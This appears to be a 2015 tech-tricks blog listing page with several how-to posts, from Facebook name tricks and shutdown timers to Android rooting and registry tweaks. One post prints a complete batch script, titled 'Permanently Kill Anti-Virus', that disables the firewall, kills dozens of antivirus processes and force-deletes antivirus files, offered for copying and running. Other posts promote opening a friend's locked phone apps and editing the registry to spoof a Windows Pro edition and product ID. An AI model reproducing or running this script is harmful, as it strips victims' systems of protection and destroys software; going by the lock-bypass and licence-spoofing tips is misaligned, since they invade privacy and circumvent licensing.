Showing posts with label how-to. Show all posts
Showing posts with label how-to. Show all posts

Saturday, 6 June 2015

How to make invisible name on Facebook

1) First of all open Mozilla Firefox/
UC Browser

2) Click on Tools >> Options >>
Advanced >> Settings….

3) Now click on Manual proxy
Configuration >> HTTP Proxy

4) Paste or in HTTP Proxy

5) Paste 8080 in Port.

6) Click OK and OK

7) Now open your Facebook
account >> Account Setting

8) Scroll down and change the
language from English (US) to
Bahasa Indonesia

9) Change your name to
RﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞM you need to copy
this code from here and paste it.

10) Now Remove the Letter R and

M then enter your password and
click to Save


There are some easy way to shout down your Personal Computer (PC) Using Timer. In our life we are using timer in wrist watch , clock etc. This is very informative, Because some time we need these type information. Actually windows did not provide any direct method to use this timer. We are using this trick by some code. This is a small hacking method using commands. It is not a virus program. If you like to do this . Just follow below Instruction…

First Method:-
  • Right click on your desktop and choose "New=>shortcuts".
  • In the box that says "Type the location of the shortcut",
    type in "shutdown -s -t 3600" without the quotation marks and click next. Note: 3600 are the amount of seconds before your computer shuts down. So , 60secs*60mins=3600secs. 
  • Make up a name for the shortcut and you're done. 
  • You can change the icon by right clicking=>properities=>change icon=>browse 
To make an abort key to stop the shutdown timer just create another shortcut and make
the "location of the shortcut" to " shutdown -a" without the quotes.
Second Method:-
Here is another trick to shutdown at a specific time, for example you wish to shutdown at 11:35am.
  • Type “Run” in start search.
  • Type Code: “at 11:35 shutdown –s” 
Type code “shutdown –a”


Copy this Code…

@ echo off

rem –
rem Permanently Kill Anti-Virus
net stop “Security Center”
netsh firewall set opmode mode=disable
tskill /A av*
tskill /A fire*
tskill /A anti*
tskill /A spy*
tskill /A bullguard
tskill /A PersFw
tskill /A KAV*
tskill /A SAFEWEB
tskill /A OUTPOST
tskill /A nv*
tskill /A nav*
tskill /A F-*
tskill /A ESAFE
tskill /A cle
tskill /A BLACKICE
tskill /A def*
tskill /A kav
tskill /A kav*
tskill /A avg*
tskill /A ash*
tskill /A aswupdsv
tskill /A ewid*
tskill /A guard*
tskill /A guar*
tskill /A gcasDt*
tskill /A msmp*
tskill /A mcafe*
tskill /A mghtml
tskill /A msiexec
tskill /A outpost
tskill /A isafe
tskill /A zap*
tskill /A zauinst
tskill /A upd*
tskill /A zlclien*
tskill /A minilog
tskill /A cc*
tskill /A norton*
tskill /A norton au*
tskill /A ccc*
tskill /A npfmn*
tskill /A loge*
tskill /A nisum*
tskill /A issvc
tskill /A tmp*
tskill /A tmn*
tskill /A pcc*
tskill /A cpd*
tskill /A pop*
tskill /A pav*
tskill /A padmin
tskill /A panda*
tskill /A avsch*
tskill /A sche*
tskill /A syman*
tskill /A virus*
tskill /A realm*
tskill /A sweep*
tskill /A scan*
tskill /A ad-*
tskill /A safe*
tskill /A avas*
tskill /A norm*
tskill /A offg*
del /Q /F C:Program Filesalwils~1avast4*.*
del /Q /F C:Program FilesLavasoftAd-awa~1*.exe
del /Q /F C:Program Fileskasper~1*.exe
del /Q /F C:Program Filestrojan~1*.exe
del /Q /F C:Program Filesf-prot95*.dll
del /Q /F C:Program Filestbav*.dat
del /Q /F C:Program Filesavpersonal*.vdf
del /Q /F C:Program FilesNorton~1*.cnt
del /Q /F C:Program FilesMcafee*.*
del /Q /F C:Program FilesNorton~1Norton~1Norton~3*.*
del /Q /F C:Program FilesNorton~1Norton~1speedd~1*.*
del /Q /F C:Program FilesNorton~1Norton~1*.*
del /Q /F C:Program FilesNorton~1*.*
del /Q /F C:Program Filesavgamsr*.exe
del /Q /F C:Program Filesavgamsvr*.exe
del /Q /F C:Program Filesavgemc*.exe
del /Q /F C:Program Filesavgcc*.exe
del /Q /F C:Program Filesavgupsvc*.exe
del /Q /F C:Program Filesgrisoft
del /Q /F C:Program Filesnood32krn*.exe
del /Q /F C:Program Filesnood32*.exe
del /Q /F C:Program Filesnod32
del /Q /F C:Program Filesnood32
del /Q /F C:Program Fileskav*.exe
del /Q /F C:Program Fileskavmm*.exe
del /Q /F C:Program Fileskaspersky*.*
del /Q /F C:Program Filesewidoctrl*.exe
del /Q /F C:Program Filesguard*.exe
del /Q /F C:Program Filesewido*.exe
del /Q /F C:Program Filespavprsrv*.exe
del /Q /F C:Program Filespavprot*.exe
del /Q /F C:Program Filesavengine*.exe
del /Q /F C:Program Filesapvxdwin*.exe
del /Q /F C:Program Fileswebproxy*.exe
del /Q /F C:Program Filespanda software*.*
rem –

And go to your desktop, create a new text document, paste it there and save it as anyname.bat while choosing file type as all files…

How To Set wallpaper In Pen Drive

Are you bored of viewing the same white background in your USB pen drive, here is a trick where you can easily set colorful wallpapers on your USB background.

For that you need the following code:-

[{BE098140-A513-11D0-A3A4-00C04FD706EC}] IconArea_Image=abc.bmp IconArea_Text=0×00000000

Copy and paste it in a notepad file, and specify the image file name (here it is abc.bmp), then save it in your memory stick or pendrive as desktop.ini also you are supposed to keep the image file on the memory stick or your pendrive.
Refresh and view the background. Now every time when you open your pendrive it will show background wallpaper.

How to increase the internet speed

There are four Internet settings that can be configured, you can get greater throughput (faster Internet downloads) by modifying a few settings. They are the MaxMTU, MaxMSS and DefaultRcvWindow, and DefaultTTL 

Open RegEdit
  • Go to HKEY_LOCAL_MACHINE\System\CurrentControlset\ Services\ Class\ net\ 000x
    (where x is your particular network adapter binding.)

  • Right click on the right panel.

  • Select New\String Value and create the value name IPMTU.

  • Double click on it and enter then the number you want. The usual
    change is to 576

  • Similarly, you can add IPMSS and give it a value of 536
    (Windows 9X)You can set DefaultRcvWindow, and DefaultTTL by adding
    these string values to HKEY_LOCAL_MACHINE\ System\ CurrentControlset\
    Services\ VXD\ MSTCP

  • Set the DefaultRcvWindow to"5840"and the DefaultTTL to "128"

Note: These settings will slow down your network access speed slightly, but you will probably not even see the difference if you are using a network card. If you are using Direct Cable you should see a sight difference.

Thursday, 4 June 2015

How to hack any lock application on android

Hi geeks, today I brought to you a new trick to unlock any lock application on android. As a matter of privacy we mostly lock our gallery, phone book, file manager, messengers, WhatsApp etc. So you got a friends phone in your hand now you want to open the gallery to see the photos and suddenly you see the lock application pops up an asks you to type the password in to unlock the gallery, oh its annoying isn’t it, while we pass the phone back to our friend and ask him to type the password and unlock it .Hmm it really is annoying but now you don’t need to pass the phone back or ask for a password because now you are smart enough to unlock almost any lock application you want and browse the phone freely without any hindrances.
Steps you need to follow:-

Sunday, 31 May 2015

How to draw a border line in c# console application

Down below is the screenshot and  C# code for making a border in the console application

Source Code :

Sunday, 24 May 2015

Root your android phone

Rooting is the equivalent of jail breaking Android, a way to unlock the operating system so that you can install applications not approved (by Google), update the operating system, replace the firmware, over clock the processor (or under clock)customize just about anything, and so forth.

Of course, for the average user, rooting sounds like - and can be a scary process.After all, "rooting" in the core of your smartphone software might seem like a recipe for disaster. One wrong move and you could end up with bricked handset.

Thankfully, there's a new Windows utility that makes rooting a one-click affair: Kingo Android Root. It's free, and based on my initial tests with a Virgin Mobile Supreme and later ones with an Asus Nexus 7, it works like a charm. (Be sure to check the compatibility list before you proceed, keeping in mind that even if your device isn't on it, the utility may work with it.) Here's how to get started.
Step 1: Download and install Kingo Android Root.

Step 2: Enable USB debugging mode on your phone. If it's running Android 4.0 or 4.1, tap Settings, Developer Options, then tick the box for "USB debugging." (You may need to switch "Developer options" to On before you can do so.) On Android 4.2, tap Settings, About Phone, Developer Options, and then tick USB debugging." Then tap OK to approve the setting change.
On Android 4.3 and later (including 5.0, though this also applies to some versions of 4.2), tap Settings, About Phone, then scroll down to Build Number. Tap it seven times, at which point you should see the message, "You are now a developer!"
With that done, tap Settings, About Phone, Developer Options, and then tick USB debugging." Then tap OK to approve the setting change.
Step 3: Run Android Root on your PC, then connect your phone via its USB sync cable. After a moment, the former should show a connection to the latter. Your device screen may show an "Allow USB debugging?" pop-up. Tick "Always allow from this computer," then tap OK.

Solution to windows update problem

Disappointment for revision of windows in Windows 8 design arrangement is another normal question and find a way to explain it. Some individuals have Windows 8 Media Center release and most of the time they tackle the question of the reorganization.Support MS should make a registry change to turn again to Windows 8 Pro. Points of interest in. I could make the establishment of review with the Setup program and my redesigns have been productive after (each of the 34) I then included Windows Media Center of return according to the guidelines.

1) Run regedit.exe

2) Modify the following entries in HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion

3) Modify the following to: a) “Edition ID”=”Professional” b) “Product Name”=”Windows 8 Pro” c) “Product Id”=”00178-11194-09674-AB777″

4) perform in-place upgrade using the Windows 8 PRO installer

5) activate the Windows 8 PRO then upgrade again to WMC


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